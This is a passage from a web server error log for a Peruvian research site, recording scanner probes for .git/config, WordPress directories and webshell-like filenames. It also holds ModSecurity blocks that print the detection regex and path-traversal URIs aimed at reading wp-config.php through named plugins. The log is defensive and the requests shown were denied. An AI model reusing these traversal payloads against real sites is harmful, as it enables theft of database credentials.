3395:tid 140439761868672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 01 03:49:49.640017 2025] [ssl:warn] [pid 3395:tid 140439761868672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 01 03:49:51.370928 2025] [ssl:warn] [pid 3395:tid 140439761868672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 01 03:49:53.639184 2025] [ssl:warn] [pid 3818:tid 140514722830208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 01 03:49:53.883038 2025] [ssl:warn] [pid 3819:tid 140514722830208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2025/01/01 18:12:24 [error] 3715#3715: *198476 access forbidden by rule, client: 45.148.10.80, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/01 20:42:17 [error] 3715#3715: *201170 access forbidden by rule, client: 45.148.10.80, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/01/01 21:47:09 [error] 3715#3715: *203035 access forbidden by rule, client: 45.148.10.80, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/01 23:41:38 [error] 3714#3714: *204636 access forbidden by rule, client: 45.148.10.80, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/01 23:52:01 [error] 3714#3714: *204814 access forbidden by rule, client: 45.148.10.80, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jan 02 02:46:44.963248 2025] [authz_core:error] [pid 8212:tid 140514384918272] [client 146.190.63.248:43016] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/02 02:46:48 [error] 3715#3715: *210278 access forbidden by rule, client: 146.190.63.248, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jan 02 03:13:40.303894 2025] [ssl:warn] [pid 21780:tid 140089580730240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 02 03:13:40.533219 2025] [ssl:warn] [pid 21781:tid 140089580730240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 02 03:13:41.163996 2025] [ssl:warn] [pid 21781:tid 140089580730240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 02 03:13:43.975204 2025] [ssl:warn] [pid 21781:tid 140089580730240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 02 03:13:46.263187 2025] [ssl:warn] [pid 22197:tid 139745944328064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 02 03:13:46.483776 2025] [ssl:warn] [pid 22198:tid 139745944328064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 02 06:38:33.751430 2025] [authz_core:error] [pid 22216:tid 139745652881152] [client 206.81.24.227:46278] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/02 06:38:38 [error] 22178#22178: *212556 access forbidden by rule, client: 206.81.24.227, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/02 08:09:41 [error] 22178#22178: *213466 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/02 10:25:43 [error] 22178#22178: *215529 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Thu Jan 02 14:28:51.656806 2025] [autoindex:error] [pid 22216:tid 139745543776000] [client 45.131.194.121:55578] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Thu Jan 02 14:28:58.875059 2025] [autoindex:error] [pid 22773:tid 139745686451968] [client 45.131.194.121:55598] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Thu Jan 02 14:29:12.803059 2025] [autoindex:error] [pid 22773:tid 139745594132224] [client 45.131.194.121:55620] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Thu Jan 02 14:29:19.496717 2025] [autoindex:error] [pid 22216:tid 139745661273856] [client 45.131.194.121:55636] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 02 14:29:21.139512 2025] [autoindex:error] [pid 22217:tid 139745518597888] [client 45.131.194.121:55640] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Thu Jan 02 14:29:36.269593 2025] [autoindex:error] [pid 22773:tid 139745552168704] [client 45.131.194.121:55670] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Thu Jan 02 14:29:36.661754 2025] [:error] [pid 22773:tid 139745619310336] [client 45.131.194.121:55672] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Thu Jan 02 14:29:39.307985 2025] [autoindex:error] [pid 22773:tid 139745526990592] [client 45.131.194.121:55678] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Thu Jan 02 14:29:42.050156 2025] [autoindex:error] [pid 22216:tid 139745619310336] [client 45.131.194.121:55684] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Thu Jan 02 14:30:01.881630 2025] [autoindex:error] [pid 22215:tid 139745510205184] [client 45.131.194.121:55722] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Thu Jan 02 14:30:10.298671 2025] [autoindex:error] [pid 22216:tid 139745636095744] [client 45.131.194.121:55736] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Thu Jan 02 14:30:14.947161 2025] [autoindex:error] [pid 22773:tid 139745610917632] [client 45.131.194.121:55744] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Thu Jan 02 14:30:21.164608 2025] [autoindex:error] [pid 22216:tid 139745526990592] [client 45.131.194.121:55754] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Thu Jan 02 14:30:22.741229 2025] [autoindex:error] [pid 22215:tid 139745636095744] [client 45.131.194.121:55758] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Thu Jan 02 14:30:25.563853 2025] [:error] [pid 22215:tid 139745568954112] [client 45.131.194.121:55764] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Jan 02 14:30:29.400857 2025] [autoindex:error] [pid 22215:tid 139745669666560] [client 45.131.194.121:55772] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Thu Jan 02 14:30:38.912324 2025] [autoindex:error] [pid 22216:tid 139745669666560] [client 45.131.194.121:55784] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Thu Jan 02 14:30:54.837363 2025] [autoindex:error] [pid 22773:tid 139745535383296] [client 45.131.194.121:55818] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 02 14:31:07.812161 2025] [autoindex:error] [pid 22773:tid 139745585739520] [client 45.131.194.121:55842] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Thu Jan 02 14:31:28.521126 2025] [:error] [pid 22217:tid 139745627703040] [client 45.131.194.121:55880] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Jan 02 14:31:29.961346 2025] [autoindex:error] [pid 22217:tid 139745485027072] [client 45.131.194.121:55884] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Thu Jan 02 14:31:49.342178 2025] [:error] [pid 22216:tid 139745661273856] [client 45.131.194.121:55914] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Jan 02 14:32:10.225733 2025] [:error] [pid 22773:tid 139745510205184] [client 45.131.194.121:55954] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Thu Jan 02 14:32:27.646487 2025] [autoindex:error] [pid 22216:tid 139745535383296] [client 45.131.194.121:55984] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Thu Jan 02 14:33:20.748813 2025] [:error] [pid 22216:tid 139745518597888] [client 45.131.194.121:56614] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php 2025/01/02 22:45:22 [error] 22178#22178: *224423 access forbidden by rule, client: 3.145.22.42, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jan 03 03:49:38.981181 2025] [ssl:warn] [pid 5399:tid 140695347697536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 03 03:49:39.277838 2025] [ssl:warn] [pid 5401:tid 140695347697536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 03 03:49:39.783437 2025] [ssl:warn] [pid 5401:tid 140695347697536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 03 03:49:42.062122 2025] [ssl:warn] [pid 5401:tid 140695347697536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 03 03:49:44.437699 2025] [ssl:warn] [pid 5818:tid 140271266346880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 03 03:49:44.851414 2025] [ssl:warn] [pid 5819:tid 140271266346880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 03 06:47:55.301989 2025] [autoindex:error] [pid 6404:tid 140270989461248] [client 52.172.131.177:44926] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jan 03 21:09:09.920696 2025] [autoindex:error] [pid 5836:tid 140270863570688] [client 213.136.78.38:33590] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jan 04 03:30:07.708035 2025] [authz_core:error] [pid 6404:tid 140270981068544] [client 159.223.132.86:39354] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/04 03:30:11 [error] 5799#5799: *242218 access forbidden by rule, client: 159.223.132.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Jan 04 03:42:37.645938 2025] [ssl:warn] [pid 20366:tid 139750366259072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 04 03:42:37.947047 2025] [ssl:warn] [pid 20367:tid 139750366259072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 04 03:42:38.523691 2025] [ssl:warn] [pid 20367:tid 139750366259072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 04 03:42:40.845182 2025] [ssl:warn] [pid 20367:tid 139750366259072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 04 03:42:43.160151 2025] [ssl:warn] [pid 20787:tid 139730409486208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 04 03:42:43.463282 2025] [ssl:warn] [pid 20788:tid 139730409486208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 04 05:20:41.536414 2025] [autoindex:error] [pid 21362:tid 139730016483072] [client 13.233.179.32:40794] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jan 04 06:51:15.471657 2025] [:error] [pid 21362:tid 139730033268480] [client 88.99.78.253:41526] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Z3kgs7x6m_tTeWpdwCn0xgAAAM8"] [Sat Jan 04 06:51:18.822380 2025] [:error] [pid 21362:tid 139730041661184] [client 88.99.78.253:41534] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin.php"] [unique_id "Z3kgtrx6m_tTeWpdwCn0yAAAAM4"] [Sat Jan 04 06:51:22.188992 2025] [:error] [pid 21362:tid 139730092017408] [client 88.99.78.253:41542] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Z3kgurx6m_tTeWpdwCn0ygAAAMg"] [Sat Jan 04 06:51:22.810308 2025] [:error] [pid 21362:tid 139729982912256] [client 88.99.78.253:41544] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-document-embedder/libs/pdf.php"] [unique_id "Z3kgurx6m_tTeWpdwCn0ywAAANU"] [Sat Jan 04 06:51:23.362627 2025] [:error] [pid 20805:tid 139730209953536] [client 88.99.78.253:41546] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "Z3kgu6ZHYAKiNdQSw1MMCQAAAAI"] [Sat Jan 04 06:51:23.911402 2025] [:error] [pid 20805:tid 139729966126848] [client 88.99.78.253:41548] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php"] [unique_id "Z3kgu6ZHYAKiNdQSw1MMCgAAABc"] [Sat Jan 04 06:51:24.369937 2025] [:error] [pid 21362:tid 139730075232000] [client 88.99.78.253:41550] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php"] [unique_id "Z3kgvLx6m_tTeWpdwCn0zAAAAMo"] [Sat Jan 04 06:51:24.955410 2025] [:error] [pid 20807:tid 139730193168128] [client 88.99.78.253:41552] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag 